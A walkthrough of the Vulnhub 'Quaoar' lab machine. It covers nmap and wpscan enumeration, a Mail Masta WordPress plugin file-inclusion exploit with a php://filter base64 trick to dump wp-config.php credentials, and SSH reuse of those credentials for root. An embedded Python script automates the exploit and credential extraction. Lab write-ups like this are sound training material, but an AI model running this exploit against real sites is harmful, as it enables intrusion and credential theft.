Quaoar is a vulnerable virtual machine available on Vulnhub.com. It is designed with beginners in mind and doesn't require any advanced exploitation techniques.
I already knew Quaoar's IP address (192.168.56.100), as it is displayed when the machine boots. So I began with a standard nmap scan to see what services the machine was running:
    nmap -Pn 192.168.56.100

    Nmap scan report for 192.168.56.100
    Host is up (0.00052s latency).
    Not shown: 991 closed ports
    PORT    STATE SERVICE
    22/tcp  open  ssh
    53/tcp  open  domain
    80/tcp  open  http
    110/tcp open  pop3
    139/tcp open  netbios-ssn
    143/tcp open  imap
    445/tcp open  microsoft-ds
    993/tcp open  imaps
    995/tcp open  pop3s
    MAC Address: 08:00:27:7B:EB:52 (Oracle VirtualBox virtual NIC)
The HTTP server on port 80 immediately stood out to me, as web applications are a great place to look for low-hanging fruit. After a little manual prodding, I noticed that robots.txt mentioned the /wordpress/ directory. When hunting for vulnerabilities, WordPress is always a great place to look.
So I decided to run wpscan and enumerate any plugins that may be vulnerable (this is the wpscan 2.x syntax; wpscan 3 takes --url and --enumerate vp instead):

    wpscan -u http://192.168.56.100/wordpress/ -e vp

    [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
        Reference: https://wpvulndb.com/vulnerabilities/8609
        Reference: https://cxsecurity.com/issue/WLB-2016080220
        Reference: https://www.exploit-db.com/exploits/40290/

    [!] Title: Mail Masta 1.0 - Multiple SQL Injection
        Reference: https://wpvulndb.com/vulnerabilities/8740
        Reference: https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
A WordPress plugin that has both SQL Injection and Local-file Inclusion vulnerabilities? Shocking.
I began messing with the local file inclusion vulnerability and was able to view /etc/passwd, which was a great sign. However, when I tried to look at wp-config.php, I kept getting a blank page back. I realized the PHP code was being executed by the include instead of displayed in the browser. The work-around? Base64 encoding: reading the file through PHP's php://filter stream wrapper (php://filter/convert.base64-encode/resource=wp-config.php) returns the file's source base64-encoded rather than running it.
This returned a nice block of base64-encoded text. When decoded, I got this (truncated):

    /** MySQL database username */
    define('DB_USER', 'root');

    /** MySQL database password */
    define('DB_PASSWORD', 'rootpassword!');
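The LFI-plus-base64 step above, as an added example that is not part of the original write-up: it builds the php://filter request, strips the base64 blob out of the plugin's response, decodes it, and pulls the DB_* constants out of the recovered wp-config.php. The vulnerable endpoint and parameter name (count_of_send.php?pl=) are taken from the Exploit-DB 40290 reference wpscan printed above and are an assumption to verify against that reference; the on-disk path of wp-config.php is left to the caller. Only fetch_remote() touches the network; the rest runs offline on a constructed sample built around the two values the write-up shows.

```python
"""
Added example (not the write-up's own code): the Mail Masta LFI turned into a
wp-config.php credential dump, the way the text describes it.

Assumptions not stated on the page:
  * the vulnerable endpoint is the one in Exploit-DB 40290 (cited by wpscan),
    /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=<file>
    -- check that reference before relying on the path or parameter name;
  * the location of wp-config.php on disk is passed in by the caller.
Only fetch_remote() touches the network; everything else runs offline on a
constructed sample.
"""
import base64
import re
import urllib.parse
import urllib.request

LFI_ENDPOINT = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"
FILTER_PREFIX = "php://filter/convert.base64-encode/resource="


def lfi_url(base_url, target_file, via_filter=True):
    """Build the LFI request URL.

    With via_filter=True the file is read through PHP's php://filter stream
    wrapper, which hands back the raw bytes base64-encoded. That is the
    difference between the blank page the write-up saw for wp-config.php
    (the PHP was executed by include) and a dump of its source.
    """
    resource = FILTER_PREFIX + target_file if via_filter else target_file
    return (base_url.rstrip("/") + LFI_ENDPOINT + "?pl="
            + urllib.parse.quote(resource, safe="/:="))


def decode_filter_output(body):
    """Pull the base64 blob out of the response and decode it.

    The plugin page prints its own HTML around the included file, so take the
    longest run of base64 characters rather than decoding the whole body.
    """
    runs = re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in response; was php://filter applied?")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


# Matches define('DB_USER', 'root'); with either quote style.
DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def wp_config_creds(source):
    """Return the DB_* constants defined in a wp-config.php source as a dict."""
    return dict(DEFINE_RE.findall(source))


def fetch_remote(base_url, target_file, timeout=10):
    """Network path (not exercised offline): request the file and decode it."""
    with urllib.request.urlopen(lfi_url(base_url, target_file), timeout=timeout) as resp:
        return decode_filter_output(resp.read().decode("utf-8", "replace"))


# Constructed sample: a wp-config.php fragment built around the two values the
# write-up shows (DB_HOST is made up), wrapped in HTML the way the plugin page
# wraps whatever it includes.
SAMPLE_WP_CONFIG = """<?php
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
define("DB_HOST", "localhost");
"""
SAMPLE_RESPONSE = ("<html><body>"
                   + base64.b64encode(SAMPLE_WP_CONFIG.encode()).decode()
                   + "</body></html>")


def demo():
    """Offline walk-through: show both URL forms, decode the sample, extract creds."""
    print(lfi_url("http://192.168.56.100/wordpress", "/etc/passwd", via_filter=False))
    print(lfi_url("http://192.168.56.100/wordpress", "wp-config.php"))
    creds = wp_config_creds(decode_filter_output(SAMPLE_RESPONSE))
    print(creds)
    return creds


if __name__ == "__main__":
    demo()
```

Against a live target, fetch_remote("http://192.168.56.100/wordpress", "<path to wp-config.php>") does the whole round trip; the decode step deliberately picks the longest base64 run, because the plugin's own HTML surrounds the included content and a naive decode of the whole body fails.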
I noticed that the MySQL username was 'root', which was odd. On a whim, I tried using these credentials to SSH into the server:

    root@windows-vista:~# ssh 192.168.56.100 -l root
    root@192.168.56.100's password:
    Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

     * Documentation:  https://help.ubuntu.com/

      System information as of Tue Mar 28 19:47:10 EDT 2017

      System load:  0.0               Processes:             98
      Usage of /:   31.8% of 7.21GB   Users logged in:       0
      Memory usage: 23%               IP address for eth0:   192.168.56.100
      Swap usage:   0%                IP address for virbr0: 192.168.122.1

      Graph this data and manage this system at https://landscape.canonical.com/

    New release '14.04.5 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.

    Last login: Sun Mar 26 19:47:06 2017
    root@Quaoar:~#
And there we have it, root privileges.
The first flag I found was located in root's home directory, /root:

    root@Quaoar:~# pwd
    /root
    root@Quaoar:~# cat flag.txt
    8e3f9ec016e3598c5eec11fd3d73f6fb
    root@Quaoar:~#
I found the second flag in the /home/wpadmin/ directory with the help of the locate command:

    root@Quaoar:~# locate flag.txt
    /home/wpadmin/flag.txt
    /root/flag.txt
    root@Quaoar:~# cat /home/wpadmin/flag.txt
    2bafe61f03117ac66a73c3c514de796e
    root@Quaoar:~#
This machine has a third flag, but I wasn’t too interested in searching for it.
This was a quick and easy machine. After I finished, I read a few other write-ups and realized I had missed a pretty important detail: the WordPress admin account used "admin:admin" credentials. Had I tried that first, I could have easily logged in to WordPress and used a PHP webshell to gain access to the server. In hindsight, though, it was more fun to exploit Mail Masta's local file inclusion vulnerability and dump the wp-config.php file with the help of some base64 encoding.
Thanks for reading!